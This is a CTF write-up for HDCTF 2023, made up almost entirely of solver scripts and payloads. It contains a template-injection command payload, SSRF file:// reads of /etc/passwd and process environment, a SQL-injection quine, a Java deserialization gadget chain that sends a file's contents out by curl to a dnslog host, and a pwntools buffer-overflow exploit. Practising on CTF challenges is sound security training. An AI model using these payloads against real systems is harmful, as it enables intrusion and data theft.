HDCTF 2023 writeup

1

HDCTF{wE1c0w3_10_HDctf_M15c}

1
2
3

zip = open('Reverse.piz','rb').read()
zip_reverse = open('reverse.zip','wb')
zip_reverse.write(b''.join([(int(('%02x'%i)[::-1],16)).to_bytes(1,'little')for i in zip]))

1

NSSCTF{e67d8104-7536-4433-bfff-96759901c405}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

from Crypto.Util.number import *
import libnum
P = 8760210374362848654680470219309962250697808334943036049450523139299289451311563307524647192830909610600414977679146980314602124963105772780782771611415961
Q = 112922164039059900199889201785103245191294292153751065719557417134111270255457254419542226991791126571932603494783040069250074265447784962930254787907978286600866688977261723388531394128477338117384319760669476853506179783674957791710109694089037373611516089267817074863685247440204926676748540110584172821401
n = 12260605124589736699896772236316146708681543140877060257859757789407603137409427771651536724218984023652680193208019939451539427781667333168267801603484921516526297136507792965087544395912271944257535087877112172195116066600141520444466165090654943192437314974202605817650874838887065260835145310202223862370942385079960284761150198033810408432423049423155161537072427702512211122538749
c = 7072137651389218220368861685871400051412849006784353415843217734634414633151439071501997728907026771187082554241548140511778339825678295970901188560688120351732774013575439738988314665372544333857252548895896968938603508567509519521067106462947341820462381584577074292318137318996958312889307024181925808817792124688476198837079551204388055776209441429996815747449815546163371300963785

p_ = libnum.nroot(P,2)
q_ = libnum.nroot(Q,2)

p = libnum.gcd(p_,n)
q = libnum.gcd(q_,n)
r = n//p//q
e=65537
phi = (p-1)*(q-1)*(r-1)
d = libnum.invmod(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))

# b'HDCTF{08c66aa2-f8ea-49a2-a84f-ab9c7999ebb2}'

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

def de_code(c):
    dic = [chr(i) for i in range(ord("A"), ord("Z") + 1)]
    flag = []
    c2 = [i for i in c.split("0")]
    for i in c2:
        c3 = 0
        for j in i:
            c3 += int(j)
        flag.append(dic[c3 - 1])
    return flag


c = "842084210884024084010124"
print("".join(de_code(c)))

# NOTFLAG

1

{if phpinfo()}{/if}

1

data=​{if system('cat /f*')}{/if}

1

?url=file:///etc/passwd

1

?url=file:///proc/1/environ

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

function checkSql($s) 
{
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}
if ($row['password'] === $password) {
        die($FLAG);
    } else {
    alertMes("wrong password",'index.php');

1

1'UNION(SELECT(REPLACE(REPLACE('1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#',CHAR(34),CHAR(39)),CHAR(37),'1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#')))#

1
2
3
4
5
6
7

public static void main(String[] args) throws UnsupportedEncodingException {
    com.ctf.easyjava.utils.JwtUtil jwtUtil = new com.ctf.easyjava.utils.JwtUtil();
    User user = new User("Boogipop", "123");
    String token = jwtUtil.JwtCreate(user);
    System.out.println(token);
    System.out.println(jwtUtil.Jwttoken(token));
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

package com.ctf.easyjava;

import com.ctf.easyjava.hdctf.HDCTF;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;

import javax.xml.transform.Templates;
import java.util.HashMap;
import static com.ctf.easyjava.Tool.*;

public class R_SignedObject {
    public static void main(String[] args) throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.makeClass("i");
        CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
        ctClass.setSuperclass(superClass);
        CtConstructor constructor = ctClass.makeClassInitializer();
        constructor.setBody("Runtime.getRuntime().exec(new String[]{\"/bin/sh\", \"-c\", \"cat /flag_is_is_here | while read line; do echo $line.4m7ytd.dnslog.cn | xargs curl; done\"});");
        byte[] bytes = ctClass.toBytecode();
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{bytes});
        setFieldValue(obj, "_name", "Poria");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        HashMap table1 = getPayload(Templates.class, obj);

        HDCTF hdctf = new HDCTF(table1);

        HashMap table2 = getPayload(HDCTF.class, hdctf);
//
        run(table2, "debug", "object");
    }
    public static HashMap getPayload (Class clazz, Object payloadObj) throws Exception{
        EqualsBean bean = new EqualsBean(String.class, "r");
        HashMap map1 = new HashMap();
        HashMap map2 = new HashMap();
        map1.put("yy", bean);
        map1.put("zZ", payloadObj);
        map2.put("zZ", bean);
        map2.put("yy", payloadObj);
        HashMap table = new HashMap();
        table.put(map1, "1");
        table.put(map2, "2");
        setFieldValue(bean, "_beanClass", clazz);
        setFieldValue(bean, "_obj", payloadObj);
        return table;
    }
}

1

SERDVEZ7WTB1X2hAdjJfL1wvXEA1N2VyM2RfN2hlX3IzdjNyczN9

1

HDCTF{Y0u_h@v2_/\/\@57er3d_7he_r3v3rs3}

1
2

 mov     cl, 10h
 xor     al, cl

1

HDCTF{Just_a_e3sy_aSm}

1

HDCUF{G1Od_ql2y2r_f1r_Pwz!!|

1
2
3
4

print(flag[0]^ord('H'))
print(flag[1]^ord('D'))
print(flag[2]^ord('C'))
print(flag[3]^ord('T'))

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

xorr = [178940,248,56890,2361]
ans = [0] * 55
flag =  [178868, 188, 56953, 2413, 178874, 131, 56957, 2313, 178867, 156, 56933, 2377, 178832, 202, 56899, 2314, 178830, 167, 56924, 2313, 178830, 167, 56938, 2383, 178822, 217, 56859, 2372 ]

for i in range(len(flag)):
    ans[i] = flag[i] ^ xorr[(i % 4)]

print("".join([chr(i) for i in ans]))

# HDCTF{G0Od_pl2y3r_f0r_Pvz!!}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

n = 40  
capacity = 50  

weights = [2, 5, 10, 9, 3, 6, 2, 2, 6, 8, 2, 3, 3, 2, 9, 8,  
          2, 10, 8, 6, 4, 3, 4, 2, 4, 8, 3, 8, 4, 10, 7, 1,  
          9, 1, 5, 7, 1, 1, 7, 4, 3]
values = [8, 1, 5, 9, 5, 6, 8, 2, 3, 7, 5, 4, 3, 7, 6, 7,  
          9, 3, 10, 5, 2, 4, 5, 2, 9, 5, 8, 10, 2, 9, 6, 3,  
          7, 3, 9, 6, 10, 1, 2, 9, 4]

dp = [[0 for j in range(capacity + 1)] for i in range(n + 1)]

for i in range(1, n + 1):
    for j in range(capacity + 1):
        if weights[i - 1] <= j:
            dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - weights[i - 1]] + values[i - 1],
                           dp[i - 1][j - weights[i - 1]] - values[i - 1])
        else:
            dp[i][j] = dp[i - 1][j]

result = []
j = capacity
for i in range(n, 0, -1):
    if dp[i][j] != dp[i - 1][j]:
        result.append(i)
        j -= weights[i - 1]

print(result[::-1])

1

[1, 5, 7, 11, 12, 14, 17, 19, 22, 23, 25, 27, 32, 34, 35, 37, 40]

1

[print(str(i-1),end=' ') for i in result[::-1]]

1

NSSCTF{0 4 6 10 11 13 16 18 21 22 24 26 31 33 34 36 39}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

from pwn import *
from ctypes import *
context.log_level = 'debug'
r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p=process('./pwnner')
p=remote('node6.anna.nssctf.cn',28922)
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

libc.srand(0x39)
v0=libc.rand()

sla(b'name:\n',str(v0))
pl = b'a'*(64+8) + p64(0x4008B2)
sla(b'next?',pl)

p.interactive()